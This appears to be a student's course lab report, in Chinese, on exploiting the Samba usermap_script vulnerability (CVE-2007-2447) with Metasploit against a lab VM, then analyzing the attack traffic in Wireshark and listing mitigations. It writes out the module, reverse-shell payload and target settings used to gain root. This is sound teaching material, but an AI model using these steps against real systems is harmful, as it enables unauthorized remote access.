20253919 2025-2026-2 《网络攻防实践》第7周作业

实践内容

  1. 使用Metasploit进行Linux远程渗透攻击
    CVE-2007-2447 是 Samba 历史上最知名的高危漏洞之一,因默认关闭配置项且需特定版本,现网暴露面已极低,但在老旧内网 / 工控 / 遗留系统中仍可能遇到。核心风险是认证前的无过滤用户输入直接带入 Shell 执行,防护核心为禁用非必要脚本映射 + 版本升级 + 网络隔离。
  2. 攻防实践

实践过程

使用Metasploit进行Linux远程渗透攻击

  1. 打开msfconsole
    image
  2. use exploit/multi/samba/usermap_script使用该模块进行攻击
    image
  3. show payloads查看载荷
    image
  4. set payload cmd/unix/reverse设置双向载荷
  5. 输入set RHOST 192.168.200.30 设置靶机的地址
  6. 输入set LHOST 192.168.200.14 设置攻击机地址,
    image
  7. 输入run执行渗透攻击
    image
  8. 可以看到已成功获取靶机权限
    image

攻防实践

  1. 攻击方重复任务一操作
  2. 输入whoami,可以看到已获取root权限
    image
  3. 防守方通过wireshark进行抓包操作,并分析抓包文件
    image
  • 攻击者 IP 192.168.200.14
  • 目标 IP:192.168.200.30
  • 目标端口:139(SMB 服务端口,Samba 文件共享服务默认端口)
  • 后续反弹 Shell 建立的端口为4444(攻击机的监听端口,靶机主动回连)
  • 攻击发起时间抓包中第1个数据包的时间戳:0.000000000 也就是本次攻击会话的起始时间,后续所有流量都基于这个时间轴。
  • 攻击利用的漏洞:结合抓包里的 SMB 交互特征(Session Setup AndX Request、Error响应,以及 Metasploit 攻击 Samba 的典型场景),可以确定是:CVE-2007-2447
    漏洞原理:Samba 服务在处理用户名映射脚本时,未对输入进行安全过滤,攻击者可以通过构造恶意的 SMB 请求,注入任意系统命令,实现无权限远程代码执行。
    属于Metasploit 最经典的 Samba 攻击模块,对应模块为 exploit/multi/samba/usermap_script。
  • 使用的 Shellcode:本次攻击使用的是 Metasploit 框架内置的Linux 反弹 Shellcode,核心功能是让靶机主动回连攻击机的4444端口,建立交互式命令行会话
  1. 通过追踪TCP流,可以发现攻击方进行了ifconfig和whoami操作
    image

学习中遇到的问题及解决

  • 问题:在相同网关VMNet8下,kali机无法成功ping通Metasploitable_ubuntu靶机
  • 解决方案:重新配置Metasploitable_ubuntu靶机,重新配置其IP地址为192.168.200.30,问题解决
    image

实践总结

通过学习 usermap_script 安全漏洞(CVE-2007-2447),我了解到该漏洞是 Samba 服务因配置不当、未过滤特殊字符导致的远程命令注入漏洞,无需认证便可被恶意利用获取服务器权限,同时掌握了漏洞成因、利用方式,也学会了通过关闭危险配置、升级程序、限制端口访问等手段进行防护修复,深刻认识到老旧软件与不合理配置带来的网络安全风险,提升了网络安全防护意识。

posted @ 2026-04-27 14:20  晓月12  阅读(10)  评论(0)    收藏  举报